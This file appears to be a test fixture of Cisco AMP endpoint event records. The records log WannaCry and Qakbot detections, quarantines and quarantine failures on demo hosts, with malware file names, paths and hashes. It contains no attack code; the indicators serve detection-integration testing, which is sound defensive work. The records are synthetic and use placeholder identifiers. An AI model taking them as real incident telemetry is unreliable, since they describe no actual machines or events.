+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt 
Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
